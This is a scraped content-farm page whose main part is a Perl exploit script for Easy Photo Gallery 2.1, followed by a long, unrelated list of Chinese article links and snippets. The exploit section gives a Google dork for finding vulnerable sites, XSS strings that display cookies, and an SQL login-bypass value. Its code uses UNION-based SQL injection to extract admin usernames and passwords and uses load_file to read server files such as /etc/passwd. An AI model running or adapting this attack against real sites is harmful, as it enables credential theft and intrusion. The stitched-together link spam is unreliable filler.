Easy,Photo,Gallery,2.1,XSS/FD/Bypass/SQL,Injection,Exploit_EasyPoser
#!/usr/bin/perl
#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
#
#Method : GET
#
#Alert : High
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#----------------------------------------------------------------
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------
#Xss Vulnerabilities :
#
#Xss 1 : gallery.php?galleryid=<script>alert(document.cookie)</script>
#Xss 2 : show.php?imageid=156&size="""<?>>""""<script>alert(document.cookie)</script>
#Xss 3 : show.php?imageid=<script>alert(document.cookie)</script>
#
#----------------------------------------------------------------
#Login Bypass :
#
#Insert in gallery.php
#
#User : admin " or " 1=1
#Password : Dr.Crash
#
#----------------------------------------------------------------
#Sql Injection :
#
#Injection 1 : show.php?imageid=<sql>
#----------------------------------------------------------------
#
# Tnx : God
#
# HTTP://IRCRASH.COM
#
#---------------------------------------------------------------- use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname="Ezphotogallery 2.1"; sub header
{
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************";
} sub usage
{
print "
* Usage : perl $0 http://Example/
****************************************************
";
}
$url = ($ARGV[0]); if(!$url)
{
header();
usage();
exit;
}
if($url !~ ///){$url = $url."/";}
if($url !~ /http:///){$url = "http://".$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = "/show.php?imageid=999 union select 0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9 from users/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( "Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9" );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type("application/x-www-form-urlencoded");
$req->header("content-length" => $contlen);
$req->content($poststring); $response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string(); @name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0]; @password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0]; if(!$name && !$password)
{
print "nn";
print "!Exploit failed ! :(nn";
exit;
} print "n Username: ".$name."nn";
print " Password: " .$password."nn";
}
#XPL2 sub xpl2()
{
print "n Example For File Address : /home/user/public_html/config.phpn Or /etc/passwd";
print "n Enter File Address :";
$fil3 = <stdin>; $vul = "/show.php?imageid=999 union select 0,1,2,concat(0x4c6f67696e3a,load_file("$fil3"),0x3c656e64757365723e),4,5,6,7,8,9 from users/*";
$requestpage = $url.$vul; my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( "Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9" );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type("application/x-www-form-urlencoded");
$req->header("content-length" => $contlen);
$req->content($poststring); $response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
if(!$name && !$password)
{
print "nn";
print "!Exploit failed ! :(nn";
exit;
} open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txtn";
print ""; } #XPL2 END
#Starting;
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************
* Mod Options : *
* Mod 1 : Find Script username and password *
* Mod 2 : File Disclosure mode *
****************************************************";
print "n n Enter Mod : ";
$mod=<stdin>;
if ($mod=="1" or $mod=="2") { print "n Exploiting .............. n"; } else { print "n Unknown Mod ! n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };
- Easy,Photo,Gallery,2.1,XSS/FD/Bypass/SQL,Injection,Exploit_EasyPoser 相关文章:
- Maya使用教程-层的运用 水钻打孔使用教程视频
- 3DSMAX制作卡丁车教程:投资卡丁车场要多少钱
- [3dsmax墨水瓶建模教程]3dsmax综合建模全实
- 【3ds,Max教程:制作精美可爱的高跟鞋】 3
- [3ds,Max实例教程:打造机械原型] 3dsMax
层的概念在许多图形软件中已经广泛地运用。Maya也把层的工作模式引入了动画的制作中,...
这篇教程教三联的朋友们用3DSMAX打造卡丁车,教程难度一般,打造出来的卡丁车挺漂亮的...
教程教3dsmax爱好者们用3dsmax打造一个墨水瓶模型。制作难度中等。转发过来和飞特的朋...
本文分享的是一篇3dsMax的高跟鞋建模教程,希望能够对大家有所帮助。先看看效果图第一...
大家好,这里我将向大家展示我的个人作品,并演示如何创作一张具有细节的法线贴图,希...
- 爱情文章
- 亲情文章
- 友情文章
- 随笔
- 哲理
- 励志
- 范文大全
-
小米电视恢复出厂设置 [小米电视怎么恢复出厂设置教程?]
现在很多人买小米系列产品,现在小米电视卖的也很好,那么小米电视怎么恢复出厂设置教程?下面分享小米电视
【爱情文章】 日期:2020-02-16
-
美团拍店怎么做任务? 美团众包拍店任务什么意思
美团拍店是美团旗下数据采集APP,小伙伴可以通过做任务赚取奖励!随手拍下门店照片电话等即可赚钱哦!那
【爱情文章】 日期:2020-04-19
-
【魅族Pro5通话中如何查看联系人?】通话中查找联系人
当别人打电话给你询问他人的电话号码时,你还在手机上查看后再回拨或短信告知?接下来,大猫教你魅族Pro
【爱情文章】 日期:2020-04-16
-
天正复制粘贴快捷键 天正CAD复制粘贴快捷键失效该怎么办?
天正CAD复制粘贴快捷键失效该怎么办?很多同学安装了天正CAD后,在作图操作中使用ctrl+c复制,
【爱情文章】 日期:2020-05-08
-
iPhone开发环境的安装|环境开发对人类有什么好处辩论
---iPhone开发环境的安装今天讲讲iPhone开发环境的安装,目前在Windows上没有一个完
【爱情文章】 日期:2020-05-29
-
小米手机如何批量删除联系人 小米手机如何批量删除联系人(适应
在网上看到很多刚用小米手机的朋友不知道小米手机怎么批量删除联系人,小米手机小米2、小米3、红米等等都
【爱情文章】 日期:2020-02-23
-
BIOS参数无法进行设置:蚂蚁保护板参数无法设置
在进入BIOS设置后,无法修改设置的数据,导致这种情况的原因有很多种,各种情况处理方法也不同。1 设
【爱情文章】 日期:2020-04-05
-
苹果iPhone6S开机菜单导航关闭方法 iPhone 6S
苹果iPhone6S开机菜单导航关闭方法。手机每次重启后就会出现“开机菜单导航&rdqu
【爱情文章】 日期:2020-04-16
-
vivo手机怎么设置闹钟背景图片【闹钟ONE怎么更换提醒界面背景图
很多小伙伴都不喜欢闹钟ONE系统默认的背景图片,不喜欢的话可以更换掉,那么怎么更换背景图片呢?现在小
【爱情文章】 日期:2020-04-07
-
【iPhone来电一堆设备响?】 来电多个苹果设备同时响
我们这里分享的iOS8使用技巧,其实是关闭其他iOS设备利用iPhone蜂窝网络的接听和拨打功能,这
【爱情文章】 日期:2020-04-26
-
如何确定装修风格?:如何确定装修风格
买房装修是人生中的一件大事,装修风格的确定是房屋装修前必须确定的事情,否则无从下手。为了追求不同的生
【亲情文章】 日期:2018-08-08
-
【jsp页面中插入css样式的三种方法总结】 在jsp中怎样加入css样式
本篇文章主要是对jsp页面中插入css样式的三种方法进行了总结介绍,需要的朋友可以过来参考下,希望对
【亲情文章】 日期:2020-05-29
-
室内设计原则 室内设计的原则有哪些
(一)室内装饰设计要满足使用功能要求室内设计是以创造良好的室内空间环境为宗旨,把满足人们在室内进行生
【亲情文章】 日期:2018-08-08
-
【在matlab中同一个窗口绘制多个曲线】 matlab绘制曲线的方法
matlab中绘制二维图形有一个能在同一个坐标下绘制多个图案的功能。plot(x1,y1,x2,y2
【亲情文章】 日期:2020-05-29
-
华硕主板怎么进入bios【OEM主板是什么主板?OEM主板有什么特点?】
在组装电脑栏目,有网友向小编提问,我的主板为什么只显示OEM,这代表什么主板。本文,小编要对OEM主
【亲情文章】 日期:2020-02-09
-
机箱前置usb30接主板哪个口_怎么分清电脑主板前置机箱接线?,连接
教你认清主板前置机箱接线,连接主板跳线,装电脑连跳线就这几步,简单吧1、电源开关(POWER)这个开
【亲情文章】 日期:2020-02-09
-
【红米2a多少钱,红米2a最新报价】红米2a多少钱最新报价
红米2a多少钱?520表白日,小米三月底发布的新机红米2A今天起正式现货开卖了,该机也成为小米机型中
【亲情文章】 日期:2020-02-14
-
小度wifi插入电脑USB接口后没反应该怎么反应?_小度wifi多少钱一个
wifi是手机上网必备的伙伴,办公室没WIFI,买了个小度wifi使用几天后,插入接口窗口显示:未插
【亲情文章】 日期:2020-02-12
-
思科交换机怎么在VLAN中一次添加多个端口?:思科交换机添加vlan
思科交换机在VLAN中如何一次添加多个端口,这个在我们平时配置的过程中经常需要用到,因为如果一个一个
【亲情文章】 日期:2020-02-15
-
[i5-4690配GTX770显卡实现高端DIY装机图文直播全过程,附配置清单
很多玩家为了提高电脑的性能,选择了自己搭配硬件进行电脑组装,今天教程网小编为大家带来一套定位2015
【亲情文章】 日期:2020-02-11
-
【支付宝小视频如怎么保存?】 支付宝小视频怎么保存到相册
对于今天推出的最新支付宝9 2版本中,支付宝给我们新增了小视频功能,可以实现10秒视频拍摄,这点跟微
【友情文章】 日期:2020-05-05
-
ppt如何实现点击文字显示图片效果|ppt点击图片出现文字
ppt实现点击文字显示图片的效果的方法1、首先,打开PTP,找到需要链接的文字,然后选中该文字,比如
【友情文章】 日期:2020-03-11
-
【如何查看电脑的网速?】在电脑怎么查看网速
在“开始→运行”中输入gpedit msc,打开组策略编辑器。找到
【友情文章】 日期:2020-05-29
-
怎么按成绩分班 [巧用WPS快速进行自动分班操作]
前言:分班是教学管理信息化的一个热门话题,一般要用专门的软件,经过试验,用手头上的WPS电子表格,不
【友情文章】 日期:2020-02-29
-
钉钉如何查看群组的群主?_钉钉查看群组
在群聊天窗口的右上角群设置标识中,进入后可以看到群主;
【友情文章】 日期:2020-04-11
-
养乐多最短的广告词 养乐多广告语
养乐多广告语:1一百亿个活的养乐多菌帮肠道做运动,肠子漂亮,人就美,活的活的养乐多,越活越开心。2给
【友情文章】 日期:2020-03-16
-
百度导航没有声音怎么回事?|导航没声音是怎么回事
百度导航是百度公司推出的一款专门为驾车导航的一款软件,这款软件有车载模式和地图模式,进入车载模式的时
【友情文章】 日期:2020-04-16
-
小米手环怎么设置整点报时实现手表的功能?:小米手环整点报时
小米手环是很多人的选择,但是小米手环不是手表,不能起到提示时间的作用。看完这篇经验,你就知道如何让小
【友情文章】 日期:2020-02-11
-
十三步简单入侵个人电脑教程:如何简单入侵苹果手机
木马冰河是一款功能强大的远程控制软件,因为它的功能很强大所以成为了黑客们发动入侵的工具,2HK联盟M
【友情文章】 日期:2020-03-14
-
[淘宝菜鸟驿站地址能设为默认吗]如何把菜鸟驿站设置为默认地址
淘宝菜鸟驿站地址能设为默认吗至于菜鸟驿站代收点能否设为默认地址呢,这里很遗憾的告诉大家是不可以的。只
【友情文章】 日期:2020-04-03
-
【清除顽固病毒的方法】 怎样删除电脑顽固病毒
有些病毒非常的顽固,在删除后等你重启电脑,它又来了,一起看看清除顽固病毒的方法。一、清空Intern
【生活随笔】 日期:2020-05-29
-
Redmine+SQL,SERVER在Windows下的安装 Windows下安装grub
我们一直用Redmine做管理项目和系统缺陷跟踪 最近中心开发了微信平台,并引入了电话系统,都是SQ
【生活随笔】 日期:2020-05-29
-
迅雷广告和插件怎么去掉_怎么去掉软件内的广告插件
迅雷使我们日常生活中经常使用的软件,不过,迅雷里面的广告和插件可真是令人头疼。今天,小编就来跟大家分
【生活随笔】 日期:2020-04-12
-
【怎么让美食显得更加诱人的拍摄技法】 彩蛋技法
古代皇帝用膳先得请一个人先替自己尝两口,等别人吃完过一会儿一看没事,好,这菜没被下毒,这就可以放心吃
【生活随笔】 日期:2020-03-18
-
[三星UA55ES8000有网络端口(LAN)端口吗]三星UA55ES800
三星UA55ES8000有1个网络端口(LAN)端口。
【生活随笔】 日期:2020-03-22
-
非阿里巴巴集团网站购物流程_免税店购物流程
1以美团网为例,各网站实际操作流程会有不同,请以实际操作页面提示为准。如:打开美团网(),找到需要购
【生活随笔】 日期:2020-04-10
-
预约试驾【滴滴试驾怎么预约?】
滴滴试驾业务已经在全国逐步上线了,那么如何进行预约使用呢?估计很多用户还不太会操作吧!没关系,下面三
【生活随笔】 日期:2020-04-19
-
浜崎真绪所有作品百度云盘_360云盘手机版想分享视频给所有朋友怎
可以使用云盘朋友圈,选择发送给所有的好友,这样他们都可以看到了,直是简单方便呢。图示:
【生活随笔】 日期:2020-04-07
-
PhotoShop制作泼墨山水风景画_水彩风景画详细步骤图
中国画以水调墨,在生宣纸上用墨色的浓淡变化绘出美丽的画面。下面我们用Photoshop将一幅照片处理
【生活随笔】 日期:2020-04-05
-
支付宝怎样查询提现记录 [支付宝如何查询提现记录?]
1登录支付宝账户(),【交易记录】—【提现记录】,使用提现的状态进行筛选
【生活随笔】 日期:2020-04-11
-
[serverx病毒怎么清理] 一键手机清理应用
第一步:开始--运行输入regedit确定进入注册表删除如下项:[HKEY_CURRENT_USER
【人生哲理】 日期:2020-05-29
-
手绘一级减速器装配图 浩辰CAD机械教程之减速器主视图绘制
在前几期的CAD教程中,我们为大家介绍了使用浩辰CAD机械2011绘制二级齿轮减速器装配图的部分技巧
【人生哲理】 日期:2018-08-08
-
【路由器死机的四大原因分析】 路由器桥接设置图解
经常会在网上看到诸多网友在购买宽带路由器以后,在使用过程中遇到死机频繁掉线问题,给网友带来很多不便,
【人生哲理】 日期:2020-02-16
-
[浩辰建筑教程之轴号编辑(添补、重排、倒排轴号)]添补轴号
使用浩辰建筑软件轴网绘制和轴网标注好后,轴号有时候还需要进行处理。譬如:增加轴号,倒排轴号,或轴号的
【人生哲理】 日期:2018-08-08
-
Easy,Photo,Gallery,2.1,XSS/FD/Bypass/SQL,Injection,Exploit_EasyPoser
! usr bin perl ----------------------------------
【人生哲理】 日期:2020-02-18
-
中兴Z9,Max/Z9,Mini开箱测评:中兴手机刷机教程图解
为了满足消费者的不同需求,不少手机厂商都推出了尺寸各异的设备。3月下旬的时候,中兴在北京演艺中心召开
【人生哲理】 日期:2020-02-16
-
wifi,display怎么用?努比亚Z7手机的wifi,display功能使用方法介
如今很多智能手机均支持WIFIDisplay技术,通过该功能,用户可以利用Wifi无线网络,将手机无
【人生哲理】 日期:2020-02-23
-
红米note移动版 红米Note增强版提示相机已停止运行情况的解决办
我们知道小米MIUIV6系统时不时送上更新,最近小编的红米Note增强版更新了一系统,结果杯具了。打
【人生哲理】 日期:2020-02-19
-
淘宝降权【交换链接技巧如何样判断网站是否降权】
下面简单总结下,交换友情连接时需要注意的事项:最近换链接发现了一个问题,有很多看似收录不错的站,其实
【人生哲理】 日期:2020-02-20
-
酷派新机 [酷派大神F2新机商城今日开启预约,9月2日正式发售]
昨天酷派正式发布了旗下的旗舰机酷派大神F2,而酷派在发布会上已经表示了,酷派大神F2将会在发布次日在
【人生哲理】 日期:2020-02-23
-
Apple,Watch在表盘上添加文字与符号的方法:小车表盘上符号
很多苹果手表AppleWatch的用户都知道怎么更换表盘的图片,那么,大家知道怎么在表情上显示自己的
【励志文章】 日期:2020-03-19
-
AMD,760K与AMD,860K哪个好?AMD速龙ii,X4,860K和760K区别对比介绍|AMD速龙IIX4
近日AMD推出了新一代屏蔽核显,可超频的AMD速龙iiX4860k四核处理器,该处理器主要用户取代上
【励志文章】 日期:2020-02-09
-
美团怎么买学生票 美团团购怎么购买学生票
接下来小编就教大家美团团购购买学生票方法。1)打开美团团购进入应用后【向左拨动】功能栏,接着点击【火
【励志文章】 日期:2020-04-15
-
监控sd卡显示不存在 安卓手机sd卡不存在是什么原因
1、请确保你的手机中装有SD卡,且SD卡无损坏;2、请确保你的SD卡接触良好,在“设置-
【励志文章】 日期:2020-05-21
-
恋夜院影安卓uc列表 [支持安卓5.0的手机有哪些]
1、魅族mx系列作为国内知名的安卓深度定制系统Flyme,何时能够适配上Android5 0更是受到
【励志文章】 日期:2020-05-24
-
【利用wps文字制作一张漂亮的座位表】如何用wps制作座位表
在如今的生活年代里,学校教室,体育赛场,公司会议,演唱会,晚会,聚会,乘车坐船等很多场所,常常涉及到
【励志文章】 日期:2020-05-25
-
【宝贝主图帮助拉动流量】 站外投放如何进行拉动流量
如果说你有去亲自去搜索过淘宝你想要的产品话,那你就要想想在一大堆产品里面吸引你去点击的主图是什么样的
【励志文章】 日期:2020-05-29
-
12308汽车票 [12308汽车票包车方法]
12308汽车票包车方法。想要多人结伴去游玩?或者想要同伴一起回家?一起来包车吧!时间方面更自由。那
【励志文章】 日期:2020-04-07
-
【Winpe启动画面的修改方法】 wince导航启动画面修改
Winpe现在是经常使用了,但你是否知道Winpe的启动画面也可以随心所欲呢?下面就跟着来操作一下吧
【励志文章】 日期:2020-04-23
-
苹果iPone6手机换运营商后无法连接网络的解决办法:苹果7无法连接
用苹果手机的用户换卡后可能也换了运营商,这时候蜂窝移动网络可能就无法使用了,这是因为两个运营商用的网
【励志文章】 日期:2020-04-25
-
最新县委办主任组织生活会个人对照检查材料(精选文档)
最新县委办主任组织生活会个人对照检查材料 总认为自己受党教育十几年,党性修养不会出现重大问题,因而对加强党性修养和党性锻炼重视不够,下面是小编给大家带来的最新县...
【范文大全】 日期:2022-04-22
-
终个人总结汇报((10篇))【精选推荐】
是对一定时期内的工作加以总结,分析和研究,肯定成绩,找出问题,得出教训,摸索事物的发展规律。今天的小编给大家分享了2022年终汇报,想看更多的请点击查看。2022年终个人...
【范文大全】 日期:2022-04-22
-
2022年疫情期间防控工作总结最新版
,人们可以把零散的、肤浅的感性认识上升为系统、深刻的理性认识,从而得出科学的结论,以便改正缺点,吸取教训,使今后的工作少走弯路,多出成果。下面小编给大家带来疫情期...
【范文大全】 日期:2022-04-22
-
幼儿教师工作总结范本合集
2022幼儿教师工作总结精选范文5篇 根据制定的活动目标、内容与要求组织好教育教学活动的各环节,保证好幼儿每天的游戏活动及户外活动时间,提供幼儿活动材料,更好地培养幼...
【范文大全】 日期:2022-04-22
-
教师疫情期间防控工作总结7篇【优秀范文】
的写作过程,既是对自身活动的回顾过程,又是人们思想认识提高的过程,它还可以作为先进而被上级推广,为其他单位所汲取、借鉴,从而推动实际工作的顺利开展。下面小编给大家...
【范文大全】 日期:2022-04-22
-
2022年学生入团申请书1000字左右范本【优秀范文】
》是要求加入团组织的青年向中国共产主义青年团组织递交的表达自己志愿加入团组织的一种文书。下面是小编整合的学生入团申请书1000字左右,一起来看看吧。学生入团申请书1000...
【范文大全】 日期:2022-04-22
-
2022年国家安全教育最新心得感悟(完整)
最新心得感悟,希望对您有所帮助!国家安全教育最新心得感悟1网络安全教育是国家安全教育的重要组成部分。国家网络安全教育或者国家安全的集中系统教育是中国在大国和强国道路...
【范文大全】 日期:2022-04-22
-
领导干部理论学习调研报告
领导干部理论学习调研报告2022 学到很多东西的诀窍,就是一下子不要学很多。下面是范文网小编为您推荐领导干部理论学习调研报告2022。 一、当前领导干部理论学习存在...
【范文大全】 日期:2022-04-22
-
中学生家长会优秀学生发言稿实用范本合集
2022中学生家长会优秀学生发言稿实用范文5篇 通过这次的家长会我学习了很多学习方法和很多知识。古人云:三人行,必有我师焉,择其善者而从之,其不善者而改之,现在是四十...
【范文大全】 日期:2022-04-22
-
2022年度办公室主任干部任前表态发言稿【精选推荐】
办公室主任干部任前表态发言稿 书本上的知识而外,尚须从生活的人生中获得知识。下面是范文网小编为您推荐办公室主任干部任前表态发言稿。 尊敬的各位领导、同志们:...
【范文大全】 日期:2022-04-22